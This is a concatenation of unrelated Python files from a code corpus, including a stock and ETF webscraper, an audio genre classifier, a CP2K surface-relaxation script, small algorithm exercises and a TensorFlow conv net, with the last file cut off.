{'name': quote['companyName'], 'sector': quote['sector'], 'link': quote['website']}\n return company_data\n\n\ndef get_stock_news(tickers):\n stock_news = {}\n with requests_cache.disabled():\n data = _get_iex_data(tickers, ['news'], ['last=5'])\n for ticker, stock in data.items():\n news = stock['news']\n if news is None:\n continue\n news_items = []\n for news_item in news:\n news_items.append({'title' : news_item['headline'], 'description' : news_item['summary'], \n 'image_url' : _get_ticker_image(ticker), 'datetime' : _convert_time(news_item['datetime']),\n 'url' : news_item['url'], 'source' : news_item['source']})\n stock_news[ticker] = news_items\n return stock_news\n\n\ndef get_holding_data(ticker):\n holding_data = {}\n with requests_cache.disabled():\n data = _get_iex_data([ticker], ['quote', 'chart'], ['displayPercent=true', 'range=1y'])\n return data\n\n\ndef _round_price(price):\n return format(price, '.2f')\n\n\ndef _is_etf(data):\n return data.loc['ETF']\n\n\ndef _convert_time(timestamp):\n timestamp = timestamp.replace('T', ' ')\n return datetime.fromisoformat(timestamp)\n\n\ndef _get_etf_data(ticker, data, holdings):\n response = _get_etf_page(ticker)\n if not _valid_request(response):\n logging.warning('Failed to get holdings for ticker',\n ticker, response.status_code)\n return\n\n page_content = response.content\n pq = PyQuery(page_content)\n table = pq.find('#etfs-that-own')\n\n # use secondary data source if none available\n if not table:\n _get_etf_data_backup(ticker, data, holdings)\n return\n\n for row in table('tbody tr').items():\n columns = list(row('td').items())\n ticker = columns[0].children(\"a\").text()\n # disable the backup scraping because it is just too slow for larger funds\n holding_data = get_data(ticker, False)\n if holding_data is None:\n # fall back to getting name from scraped data\n name = columns[1].children(\"a\").text()\n else:\n # make use of official nasdaq data if available\n name = holding_data.loc['Security Name']\n\n weight = columns[2].text()\n weight = weight[:-1]\n holdings.append(Holding(name, ticker, weight))\n\n\ndef _get_etf_data_backup(ticker, data, holdings):\n response = _get_etf_page_backup(ticker)\n if not _valid_request(response):\n logging.warning('Failed to get holdings for ticker ', ticker)\n return\n\n page_content = response.content\n title = data.loc['Security Name']\n\n url = _get_holdings_url(page_content)\n holdings_json = _make_request(url + str(0)).json()\n rows = holdings_json['total']\n # etfdb limits us to 15 tickers per page\n for i in range(0, rows, 15):\n for entry in holdings_json['rows']:\n holding = _get_etf_holding(entry)\n holdings.append(holding)\n holdings_json = _make_request(url + str(i + 15), throttle=0.7).json()\n\n\ndef _get_stock_data(ticker, data, holdings):\n title = data.loc['Security Name']\n holding = Holding(title, ticker)\n holdings.append(holding)\n\n\ndef _get_etf_page(ticker):\n url = 'https://etfdailynews.com/etf/{0}/'.format(ticker)\n return _make_request(url, redirects=False)\n\n\ndef _get_etf_page_backup(ticker):\n url = 'https://etfdb.com/etf/{0}/'.format(ticker)\n return _make_request(url, redirects=False)\n\n\ndef _get_ticker_image(ticker):\n return 'https://storage.googleapis.com/iex/api/logos/{0}.png'.format(ticker)\n\n\ndef _get_iex_data(tickers, options, settings=None):\n data = {}\n options = \",\".join(options)\n if settings:\n options = options + (\"&\" + \"&\".join(settings))\n for i in range(0, len(tickers), 100):\n subset = \",\".join(tickers[i:i+100])\n url = 'https://api.iextrading.com/1.0/stock/market/batch?symbols={0}&types={1}'.format(subset, options)\n data.update(_make_request(url, redirects=False).json())\n return data\n\n\ndef _make_request(url, redirects=True, throttle=0.0):\n response = None\n try:\n response = requests.get(url, hooks={'response': _throttle_hook(\n throttle)}, allow_redirects=redirects, timeout=3)\n except requests.exceptions.RequestException as e:\n raise ValueError('Request exception') from e\n return response\n\n\n# returns response hook function which sleeps for\n# timeout if the response is not yet cached\ndef _throttle_hook(timeout):\n def hook(response, *args, **kwargs):\n if not getattr(response, 'from_cache', False):\n time.sleep(timeout)\n return response\n return hook\n\n\ndef _valid_request(response):\n return response.status_code == requests.codes.ok\n\n\ndef _get_holdings_url(content):\n pq = PyQuery(content)\n url = 'https://etfdb.com/'\n sort = '&sort=weight&order=desc&limit=15&offset='\n url += pq(\"table[data-hash='etf-holdings']\").attr('data-url') + sort\n return url\n\n\ndef _get_etf_holding(entry):\n name = ticker = ''\n data = entry['holding']\n pq = PyQuery(data)\n\n # handle normal cases of actual stocks\n if pq('a').length:\n ticker = pq('a').attr('href').split('/')[2].split(':')[0]\n holding_data = get_data(ticker, False)\n if holding_data is None:\n # fall back to getting name from scraped data\n name = pq('a').text().split('(')[0]\n else:\n # make use of official nasdaq data if available\n name = holding_data.loc['Security Name']\n # handle special underlyings e.g. VIX futures\n elif pq('span').eq(2).length:\n name = data\n ticker = pq('span').eq(2).text()\n # handle further special cases e.g. Cash components, Hogs, Cattle\n else:\n name = data\n ticker = data\n weight = entry['weight'][:-1]\n return Holding(name, ticker, weight)\n\n\ndef _get_data_from_yahoo(ticker):\n scraped_data = yahoo_scraper.get_data(ticker)\n\n data_dict = {}\n\n try:\n data_dict['Yahoo'] = (scraped_data.source == \"Yahoo\")\n data_dict['Price'] = _round_price(scraped_data.price)\n data_dict['Currency'] = scraped_data.currency\n data_dict['Security Name'] = scraped_data.name\n data_dict['ETF'] = scraped_data.etf\n data = pd.Series(data_dict)\n except AttributeError:\n logging.warning(\"No valid data found for \" + ticker)\n\n return scraped_data if (scraped_data is None) else data\n\n\ndef _get_company_from_yahoo(ticker):\n data = yahoo_scraper.get_company_data(ticker)\n\n data_dict = {'company': {'symbol': ticker}}\n\n try:\n company = data_dict['company']\n company['companyName'] = data.name\n company['exchange'] = data.exchange\n company['industry'] = data.industry\n company['website'] = data.website\n company['description'] = data.description\n company['CEO'] = ''\n company['issueType'] = ''\n company['sector'] = data.sector\n company['tags'] = []\n except AttributeError:\n logging.warning(\"No valid company data found for \" + ticker)\n\n return data if (data is None) else data_dict\n\n\ndef to_usd(amount, base_currency_symbol):\n temp_amount = amount\n if base_currency_symbol == '€':\n temp_amount = usd_converter.convert('EUR', amount)\n elif base_currency_symbol == '¥':\n temp_amount = usd_converter.convert('JPY', amount)\n # expandable for a lot of different currencies\n else:\n logging.warning(\"Requested conversion from unknown currency symbol \" + base_currency_symbol +\n \" to USD. Using 1:1 conversion.\")\n return amount if (temp_amount is None) else temp_amount\n","sub_path":"etfcalc/util/webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":9826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"233816825","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 18 21:52:30 2017\n\n@author: roy\n\"\"\"\nimport os\nimport pandas as pd\n\npath_dir= '/home/roy/classes/simulator/data_collect/data'\n\ndriving_info = pd.read_csv(os.path.join(path_dir, 'driving_log.csv'))\n\none_object = driving_info.ix[1]\nprint(type(one_object))\nprint(driving_info.ix[1]['steering'])\nprint(driving_info.shape)","sub_path":"pandas_test.py","file_name":"pandas_test.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"376847849","text":"from __future__ import unicode_literals\nimport warnings\nimport os\n\nwarnings.filterwarnings('ignore', category=FutureWarning)\nwarnings.filterwarnings('ignore', module='librosa')\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport pickle\nimport sys\nimport tempfile\nimport time\nimport librosa\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport simpleaudio as sa\nimport tensorflow as tf\nimport youtube_dl\nfrom PIL import Image\nfrom scipy.io.wavfile import write\nfrom eyed3 import id3\n\nIMG_PIXELS = 67000\nIMG_WIDTH = 335\nIMG_HEIGHT = 200\nNUM_LABELS = 32\nMIN_CLIP_LENGTH = 29\nNUM_FEATURES = 44\nNUM_MFCC_COEFF = 20\nSONG_EXT = 'mp3'\nLABELS_DICT = pd.read_csv('./labels_key.csv')['category']\nFEATURE_COLS = pd.read_csv('./feature_cols.csv')['feature_columns']\n\n\nclass Song:\n def __init__(self):\n self.path = None\n self.clips = []\n self.features = []\n self.spectrograms = []\n self.sr = None\n self.genre_prediction = []\n self.title = None\n self.artist = None\n\n def get_predictions(self):\n return self.genre_prediction\n\n @staticmethod\n def __add_to_series(ds, name, values):\n \"\"\" Calculates mean, min, max, and std deviation of each list of values passed to function,\n then stores value in the data series\n :param pandas.Series ds: Data series that will store audio feature data\n :param string name: name of extracted feature. Must match column header\n :param list values: python list of audio extracted data from librosa\n \"\"\"\n # set mean of values\n ds['{}-mean'.format(name)] = np.mean(values)\n # set min of values\n ds['{}-min'.format(name)] = np.min(values)\n # set max of values\n ds['{}-max'.format(name)] = np.max(values)\n # set std of values\n ds['{}-std'.format(name)] = np.std(values)\n\n def __get_features(self, source, sr):\n \"\"\" Calls librosa library to extract audio feature data then stores in pandas data series\n :param string source: path to audio file\n :param string sr: name of audio file\n \"\"\"\n # ignore librosa warning regarding PySoundFile\n warnings.filterwarnings('ignore', module='librosa')\n\n try:\n # define panda series to hold song data\n ds = pd.Series(index=FEATURE_COLS, dtype=np.float32)\n # extract specral features\n self.__add_to_series(ds, 'chroma_stft', librosa.feature.chroma_stft(y=source, sr=sr))\n self.__add_to_series(ds, 'rms', librosa.feature.rms(y=source))\n self.__add_to_series(ds, 'spec_cent', librosa.feature.spectral_centroid(y=source, sr=sr))\n self.__add_to_series(ds, 'spec_bw', librosa.feature.spectral_bandwidth(y=source, sr=sr))\n self.__add_to_series(ds, 'spec_rolloff', librosa.feature.spectral_rolloff(y=source, sr=sr))\n self.__add_to_series(ds, 'zcr', librosa.feature.zero_crossing_rate(source))\n\n # add mfcc spectral coefficients\n mfcc = librosa.feature.mfcc(y=source, sr=sr, n_mfcc=NUM_MFCC_COEFF)\n for count, e in enumerate(mfcc, start=0):\n ds['mfcc{}'.format(count)] = np.mean(e)\n\n return ds\n\n except Exception as e:\n print('ERROR: {}'.format(repr(e)))\n\n def __extract_features(self, source, sr):\n \"\"\" Extract feture data from audio source using genreml\n :param source: raw audio data\n :param sr: sampling rate of audio data\n :returns array of feature data scaled and sorted based on FEATURE_COLS list\n \"\"\"\n features = self.__get_features(source, sr)\n features_sorted = []\n for col in FEATURE_COLS:\n features_sorted.append(features[col])\n features_sorted = np.array(features_sorted)\n features_sorted = features_sorted[np.newaxis, :]\n\n # load scaler object from binary exported from trained data\n sc = pickle.load(open('./std_scaler_B.pkl', 'rb'))\n features = sc.transform(features_sorted)[0]\n return features\n\n @staticmethod\n def __extract_spectrogram(source, sr, output_path, output_name):\n \"\"\" Extract spectrogram data from audio source using librosa package\n :param source: raw audio data\n :param sr: sampling rate of audio data\n :param output_path: path to ouput spectrogram image file\n :param output_name: name that will be given to spectrogram image file\n :returns pixel data of spectrogram image generated from audio data\n \"\"\"\n # generate mel-spectrogram image data from clip\n spect_path = f'{output_path}/img{output_name}'\n mel_spect = librosa.feature.melspectrogram(y=source, sr=sr, n_fft=2048, hop_length=1024)\n mel_spect = librosa.power_to_db(mel_spect, ref=np.max)\n\n # normalize image between min and max\n img = 255 * ((mel_spect - mel_spect.min()) /\n (mel_spect.max() - mel_spect.min()))\n\n # convert pixel values to 8 bit ints\n img = img.astype(np.uint8)\n\n # flip and invert image\n img = np.flip(img, axis=0)\n img = 255 - img\n\n # create and export\n fig = plt.figure(frameon=False)\n ax = plt.Axes(fig, [0., 0., 1., 1.])\n ax.set_axis_off()\n fig.add_axes(ax)\n ax.imshow(img, aspect='auto', cmap='Greys')\n fig.savefig(spect_path)\n plt.close(fig)\n\n # open .png file and return raw pixel data\n spect_img = Image.open(f'{spect_path}.png').convert('L')\n spect_img = spect_img.resize((IMG_WIDTH, IMG_HEIGHT))\n spect_img = list(spect_img.getdata())\n return spect_img\n\n def download_song(self, url, output_path):\n \"\"\" Uses youtuble-dl package to download and extrat audio data from youtube url\n :param url: Valid youtuble url\n :param output_path: Output path to store audio file\n \"\"\"\n\n def path_hook(d):\n if not self.path:\n file = d['filename'].split('.')[0]\n self.path = f'{file}.{SONG_EXT}'\n\n ydl_opts = {\n 'format': 'bestaudio/best',\n 'outtmpl': output_path + '/%(title)s.%(ext)s',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': SONG_EXT,\n 'preferredquality': '192',\n },\n {'key': 'FFmpegMetadata'}\n ],\n 'progress_hooks': [path_hook],\n 'keepvideo': True\n }\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([url])\n\n def play_clips(self):\n \"\"\" Function loops through and plays each audio clip from self.clips array\n \"\"\"\n count = 1\n filename = 'test.wav'\n for clip in self.clips:\n # export wav file\n scaled = np.int16(clip / np.max(np.abs(clip)) * 32767)\n write(filename, self.sr, scaled)\n wave_obj = sa.WaveObject.from_wave_file(filename)\n\n # play wav file\n print(f'Playing clip #{count}')\n play_obj = wave_obj.play()\n play_obj.wait_done()\n\n # Wait 2 seconds before playing next clip\n time.sleep(2)\n count += 1\n\n # delete wav file\n os.remove(filename)\n\n def extract_song_data(self):\n \"\"\" Clips song from raw audio data based on length of song:\n If song greater than 90sec, method will clip three 29sec sections from the middle of the song\n If song less than 90sec, only middle 29sec clip extracted\n If less than 29sec, error is thrown\n \"\"\"\n y, sr = librosa.load(self.path)\n self.sr = sr\n\n # length of song in seconds\n length = len(y) / sr\n\n # assert song length greater than or equal to minimum\n if length < MIN_CLIP_LENGTH:\n raise Exception('Song length too short for accurate prediction')\n\n # if length of song less than 3 * MIN_CLIP_LENGTH, take middle section\n elif length < MIN_CLIP_LENGTH * 3 + 1:\n mid_index = int(len(y) / 2)\n lower_index = mid_index - int(sr * MIN_CLIP_LENGTH / 2)\n upper_index = lower_index + int(sr * MIN_CLIP_LENGTH)\n self.clips.append(y[lower_index:upper_index])\n\n # else split song into three clips each at MIN_CLIP_LENGTH in duration\n else:\n num_clips = 3\n mid_index = int(len(y) / 2)\n lower_index = mid_index - int(\n sr * (MIN_CLIP_LENGTH * num_clips / 2))\n\n for i in range(num_clips):\n upper_index = lower_index + int(sr * MIN_CLIP_LENGTH)\n self.clips.append(y[lower_index:upper_index])\n lower_index = upper_index\n\n # get song title and artist if avaliable\n tag = id3.Tag()\n tag.parse(self.path)\n self.title = tag.title\n self.artist = tag.artist\n\n def extract_feature_data(self, spect_output_path: str):\n \"\"\" Method to extract feature data and spectrogram image file from each audio clip in self.clips\n :param spect_output_path: Output file path for spectrogram image file\n \"\"\"\n # loop through each track section and get prediction\n print(f'Extracting data from audio file...')\n count = 1\n for clip in self.clips:\n self.features.append(self.__extract_features(clip, self.sr))\n self.spectrograms.append(self.__extract_spectrogram(clip, self.sr, spect_output_path, count))\n count += 1\n\n def predict(self):\n \"\"\" Prediction method that loops through each clip in self.clips and runs ML prediction model to\n classify song into categories defined in LABELS_DICT\n \"\"\"\n print(f'Running prediction model...')\n self.genre_prediction = np.array(\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n dtype=np.float64)\n # model = tf.keras.models.load_model('FMA_model.h5')\n model = tf.keras.models.load_model('FMA_model_seperate_genres.h5')\n count = 0\n for image, features in zip(self.spectrograms, self.features):\n count += 1\n # get prediction for each clip and and calculate average\n image = np.array(image).reshape(IMG_HEIGHT, IMG_WIDTH, 1)\n features = np.array(features)\n prediction = model.predict([np.array([features]), np.array([image])])\n self.genre_prediction += prediction[0]\n\n # calculate average of each clip prediction\n self.genre_prediction = self.genre_prediction / count\n\n\ndef main(dl_type, url_path, n):\n song = Song()\n with tempfile.TemporaryDirectory() as tmp:\n print(f'Created temporary directory: {tmp}')\n\n try:\n # download song from youtube ('-y') or get local ('-l') file\n if dl_type == '-y':\n song.download_song(url_path, tmp)\n elif dl_type == '-l':\n song.path = url_path\n else:\n raise Exception(\n 'Invalid Input: -y (youtube url) or -l (local file) must be before url or path')\n\n # extract raw audio data from song and section according to length\n song.extract_song_data()\n\n # ====== CAREFUL WITH SYSTEM VOLUME!! ======\n # song.play_clips()\n\n # get feature data and spectrogram images from each clip\n song.extract_feature_data(tmp)\n\n # get top-n genre prediction\n song.predict()\n\n # log top-n genres to console\n prediction_arr = song.get_predictions()\n\n # Log top n predictions to console\n n = int(n)\n top_n_genres = []\n top_n = np.argsort(prediction_arr)\n top_n = top_n[::-1][:n]\n for i, val in enumerate(top_n, start=1):\n top_n_genres.append(LABELS_DICT[val])\n print(f'Top {n} classified genres for ', os.path.splitext(os.path.basename(song.path))[0])\n print(top_n_genres)\n sys.stderr.write(os.path.splitext(os.path.basename(song.path))[0] + ', ' + ', '.join(top_n_genres))\n\n except Exception as e:\n print('ERROR: {}'.format(repr(e)))\n return\n\n\nif __name__ == \"__main__\":\n assert(len(sys.argv) == 4)\n assert(0 < int(sys.argv[3]) < 33)\n main(sys.argv[1], sys.argv[2], sys.argv[3])\n","sub_path":"aws_containers/fma_predictor/audio_classifier.py","file_name":"audio_classifier.py","file_ext":"py","file_size_in_byte":12495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"359104244","text":"l = eval(input('Enter the list containing number between 1 to 12'))\n\nfor i in range(len(l)):\n if l[i] > 10:\n del(l[i])\n l.insert(i,10)\n\n \n\n\n\n\nprint(l)\n","sub_path":"py.py","file_name":"py.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"48656870","text":"#!/usr/bin/env python\nfrom xcp2k import CP2K\nfrom ase.build import surface\nfrom ase.constraints import FixAtoms\nfrom ase import Atoms, Atom\nfrom ase.io import write, read\nfrom ase.visualize import view\nfrom multiprocessing import Pool\nimport os\nimport numpy as np\nimport time\n\ndef sortz(atoms):\n tags = atoms.positions[:,2]\n deco = sorted([(tag, i) for i, tag in enumerate(tags)])\n indices = [i for tag, i in deco]\n return atoms[indices]\n\n#===============================================================================\na = 15.865/4\nxyz = a/2\n#atoms = read('~/xcp2k/bulks/pt-relax/relax/')\nbulk = Atoms([Atom('Pt', (0.0, 0.0, 0.0)),\n Atom('Pt', (xyz, xyz, 0.0)),\n Atom('Pt', (xyz, 0.0, xyz)),\n Atom('Pt', (0.0, xyz, xyz))])\nbulk.cell= a * np.array([[1.0, 0.0, 0.0],\n [0.0, 1.0, 0.0],\n [0.0, 0.0, 1.0]])\natoms = surface(bulk, (1, 1, 1), 4, vacuum=0.0)\natoms = atoms*[4, 4, 1]\natoms.pbc = [True, True, True]\nconstraint = FixAtoms(mask=[atom.position[2] < 3\n for atom in atoms])\natoms.set_constraint(constraint)\natoms.cell[2][2] = 25\natoms = sortz(atoms)\n#view(atoms)\natoms.write('datas/relax.in')\n#===============================================================================\ncalc = CP2K(cpu = 24)\n#===============================================================================\nCP2K_INPUT = calc.CP2K_INPUT # This is the root of the input tree\nGLOBAL = CP2K_INPUT.GLOBAL\nMOTION = CP2K_INPUT.MOTION\nFORCE_EVAL = CP2K_INPUT.FORCE_EVAL_add()\nSUBSYS = FORCE_EVAL.SUBSYS\nDFT = FORCE_EVAL.DFT\nSCF = DFT.SCF\n#===============================================================================\nGLOBAL.Run_type = \"GEO_OPT\" # energy_force, geo_opt, cell_opt\nGLOBAL.Print_level = \"MEDIUM\"\n\nFORCE_EVAL.Method = \"Quickstep\"\nFORCE_EVAL.Stress_tensor = 'ANALYTICAL'\nFORCE_EVAL.PRINT.FORCES.Section_parameters = \"ON\"\nFORCE_EVAL.PRINT.STRESS_TENSOR.Section_parameters = \"ON\"\n\nDFT.Basis_set_file_name = \"BASIS_MOLOPT\"\nDFT.Potential_file_name = \"POTENTIAL\"\nDFT.Charge = 0\n#DFT.Multiplicity = 1\nDFT.Uks = True\n\n\n#DFT.Surface_dipole_correction = True\n#DFT.Surf_dip_dir = 'Z'\n\nDFT.MGRID.Ngrids = 4\nDFT.MGRID.Cutoff = 500\nRS_GRID_add = DFT.MGRID.RS_GRID_add()\nRS_GRID_add.Distribution_type = 'DISTRIBUTED'\n\nDFT.XC.XC_FUNCTIONAL.Section_parameters = \"PBE\"\n#DFT.XC.XC_GRID.Xc_smooth_rho = 'NN50' # The density smoothing used for the xc calculation\n#DFT.XC.XC_GRID.Xc_deriv = 'NN50_SMOOTH' # The method used to compute the derivatives\n\n#DFT.POISSON.Periodic = 'XYZ'\n\n#DFT.QS.Method = 'GPW'\n#DFT.QS.Eps_default = 1.0E-12\n#DFT.QS.Map_consistent = True # Compute the exact derivative (Hks) of the energy with respect to the density matrix. \n#DFT.QS.Extrapolation = 'ASPC' # Extrapolation strategy for the wavefunction\n#DFT.QS.Extrapolation_order = 3 # Higher order might bring more accuracy, but comes, for large systems, also at some cost.\n\nSCF.Scf_guess = \"ATOMIC\"\nSCF.Eps_diis = 0.1\nSCF.Eps_scf = 1.0E-6\nSCF.Max_scf = 50\nSCF.OUTER_SCF.Eps_scf = 1.0E-6\nSCF.OUTER_SCF.Max_scf = 20\n\nSCF.Added_mos = 500\nSCF.SMEAR.Electronic_temperature = 300\nSCF.SMEAR.Method = 'FERMI_DIRAC'\n\nSCF.DIAGONALIZATION.Algorithm = 'STANDARD'\nSCF.MIXING.Method = 'BROYDEN_MIXING'\nSCF.MIXING.Alpha = 0.1\nSCF.MIXING.Beta = 1.5\nSCF.MIXING.Nbuffer = 8\n\nKIND = SUBSYS.KIND_add('Pt') # Section_parameters can be provided as argument.\nKIND.Element = 'Pt'\nKIND.Basis_set = \"DZVP-MOLOPT-SR-GTH\"\nKIND.Potential = 'GTH-PBE'\n\n#DFT.PRINT.PDOS.Nlumo = 900\n#DFT.PRINT.PDOS.EACH.Qs_scf = 0\n#DFT.PRINT.PDOS.EACH.Geo_opt = 0\n#DFT.PRINT.PDOS.EACH.Md = 0\n#DFT.PRINT.PDOS.Add_last = 'NUMERIC'\n#===============================================================================\n#view(atoms)\n#print(len(atoms))\n#calc.mode = 1\ncalc.directory = 'relax/444'\ncalc.prefix = 'pt'\ncalc.results = {}\ncalc.CP2K_INPUT.MOTION.CONSTRAINT.FIXED_ATOMS_list = []\n#===============================================================================\natoms.set_calculator(calc)\n###calc.write_input_file()\ne = atoms.get_potential_energy()\nt = calc.get_time()\nprint(' {0} {1}'.format( t, e))\n#===============================================================================\n","sub_path":"xcp2k/surfaces/pt/relax.py","file_name":"relax.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"310454469","text":"import math\nimport os\nimport random\nimport re\nimport sys\nfrom collections import defaultdict\n\n# Complete the freqQuery function below.\n\n\ndef freqQuery(queries):\n count = defaultdict(int)\n data = defaultdict(int)\n output = []\n for idx, item in enumerate(queries):\n if item[0] == 1:\n count[data[item[1]]] -= 1\n data[item[1]] += 1\n count[data[item[1]]] += 1\n\n elif item[0] == 2:\n if data[item[1]] > 0:\n count[data[item[1]]] -= 1\n data[item[1]] -= 1\n count[data[item[1]]] += 1\n\n elif item[0] == 3:\n if count[item[1]] > 0:\n output.append(1)\n else:\n output.append(0)\n return output\n\nif __name__ == '__main__':\n # fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n q = int(input().strip())\n\n queries = []\n\n for _ in range(q):\n queries.append(list(map(int, input().rstrip().split())))\n\n ans = freqQuery(queries)\n\n print(ans)\n\n # fptr.write('\\n'.join(map(str, ans)))\n # fptr.write('\\n')\n\n # fptr.close()\n","sub_path":"Dictionaries and Hash-maps/frequencyQueries.py","file_name":"frequencyQueries.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"644413226","text":"from microservice import MicroService\nfrom modules.server import Server\n\nclass MainService(MicroService):\n def __init__(self):\n super().__init__('main.log', 'main.pid', 'config.yml')\n\n server = Server(\n self.config['servconf'], self.config['dbconf'],\n self.config['uniconf'], self.config['goipconf'])\n server.start()\n\nif __name__ == \"__main__\":\n service = MainService()","sub_path":"mainservice.py","file_name":"mainservice.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"646240353","text":"import config as cfg\r\nimport tensorflow as tf\r\nfrom tensorflow.contrib import slim\r\n\r\ndef conv_net(x, is_training):\r\n batch_norm_params = {\"is_training\": is_training, \"decay\": 0.9, \"updates_collections\": None}\r\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\r\n activation_fn=tf.nn.relu,\r\n weights_initializer=tf.truncated_normal_initializer(mean=0.0, stddev=0.01),\r\n weights_regularizer=slim.l2_regularizer(0.0005),\r\n normalizer_fn=slim.batch_norm, normalizer_params=batch_norm_params):\r\n with tf.variable_scope(\"ConvNet\", reuse=tf.AUTO_REUSE):\r\n x = tf.reshape(x, [-1, 28, 28, 1])\r\n net = slim.conv2d(x, 6, [5, 5], scope=\"conv_1\")\r\n net = slim.max_pool2d(net, [2, 2], scope=\"pool_1\")\r\n net = slim.conv2d(net, 12, [5, 5], scope=\"conv_2\")\r\n net = slim.max_pool2d(net, [2, 2], scope=\"pool_2\")\r\n net = slim.flatten(net, scope=\"flatten\")\r\n net = slim.fully_connected(net, 100, scope=\"fc\")\r\n net = slim.dropout(net, is_training=is_training)\r\n net = slim.fully_connected(net, cfg.num_classes, scope=\"prob\", activation_fn=None, normalizer_fn=None)\r\n return net","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"605228511","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport evaluate\nimport argparse\nimport ma_util\nimport csv\n\n\ndef main(goldFile, predFile, outCSVFile):\n header = []\n data = []\n atN = evaluate.accuracyAtN(goldFile, predFile, ma_util.GRANULARITY_COARSE)\n for key in sorted(atN.keys()):\n header.append('Acc at %s' % key)\n data.append(atN[key][0])\n header.append('Support at %s' % key)\n data.append(atN[key][1])\n outFH = open(outCSVFile, 'w')\n writer = csv.writer(outFH)\n writer.writerow(header)\n writer.writerow(data)\n outFH.close()\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Evaluate system output against a gold standard.')\n parser.add_argument('--gold', required=True,\n help='Gold PTB file')\n parser.add_argument('--predicted', required=True,\n help='System output (PTB file)')\n parser.add_argument('--output-file', required=True,\n help='Where to store CSV results.')\n args = parser.parse_args()\n main(args.gold, args.predicted, args.output_file)\n","sub_path":"shared/evaluate_at_length.py","file_name":"evaluate_at_length.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"574717531","text":"'''\nA Tale of Two Fits\n------------------\n\n This simple example demonstrates the fitting of a linear function to\n two Datasets and plots both Fits into the same Plot.\n'''\n\n###########\n# Imports #\n###########\n\n# import everything we need from kafe\nimport kafe\n\n# additionally, import the model function we\n# want to fit:\nfrom kafe.function_library import linear_2par\n\n############\n# Workflow #\n############\n\n# Initialize the Datasets\nmy_datasets = [kafe.Dataset(title=\"Ohne Gewicht\", axis_labels=['Drehfrequenz', 'Nutationsfrequenz'], axis_units=['Hz', 'Hz']),\n kafe.Dataset(title=\"Mit Gewicht\", axis_labels=['Drehfrequenz', 'Nutationsfrequenz'], axis_units=['Hz', 'Hz'])]\n\n# Load the Datasets from files\nmy_datasets[0].read_from_file(input_file='../messwerte/3_ohne_gewicht.dat')\nmy_datasets[1].read_from_file(input_file='../messwerte/3_mit_gewicht.dat')\n\n# Create the Fits\nfit1 = kafe.Fit(my_datasets[0], linear_2par, fit_label=\"Lineare Regression ohne Gewicht\")\n\nfit2 = kafe.Fit(my_datasets[1], linear_2par, fit_label=\"Lineare Regression mit Gewicht\")\n\nmy_fits = [fit1, fit2]\n\n# Do the Fits\nfor fit in my_fits:\n fit.do_fit(quiet=True)\n\n# Create the plots\nmy_plot = kafe.Plot(my_fits[0], my_fits[1], axis_labels=['Drehfrequenz [Hz]', 'Nutationsfrequenz [Hz]'])\n\n# Draw the plots\nmy_plot.plot_all(show_band_for='all')\n\n###############\n# Plot output #\n###############\n\n# Save the plots\nmy_plot.save('fig_aufgabe_3.pdf')\n\n# Show the plots\nmy_plot.show()\n","sub_path":"71_kreisel/python/two_linear_fits.py","file_name":"two_linear_fits.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"4704463","text":"def two_sum(ls, ex_sum):\n if (ls == None) or (ex_sum==None):\n raise TypeError\n if len(ls)==0 or ex_sum==0:\n raise ValueError\n seen = set()\n op_ls = []\n for ele1 in ls:\n for ele2 in ls:\n if ele1+ele2 == ex_sum:\n print(ele1,ele2)\n index1 = ls.index(ele1)\n index2 = ls.index(ele2)\n seen.add(index1)\n seen.add(index2)\n return list(seen)\n\n\n#print two_sum([1,3,2,-7,5],7)\n#two_sum(None,None)\n#print (a,type(a))\n","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"151635256","text":"'''\nThis runs random search to find the optimized hyper-parameters using cross-validation\n\nINPUTS:\n - OUT_ITERATION: # of training/testing splits\n - RS_ITERATION: # of random search iteration\n - data_mode: mode to select the time-to-event data from \"import_data.py\"\n - seed: random seed for training/testing/validation splits\n - EVAL_TIMES: list of time-horizons at which the performance is maximized; \n the validation is performed at given EVAL_TIMES (e.g., [12, 24, 36])\n\nOUTPUTS:\n - \"hyperparameters_log.txt\" is the output\n - Once the hyper parameters are optimized, run \"summarize_results.py\" to get the final results.\n'''\nimport time, datetime, os\nimport get_main\nimport numpy as np\n\nimport import_data as impt\n\n\n# this saves the current hyperparameters\ndef 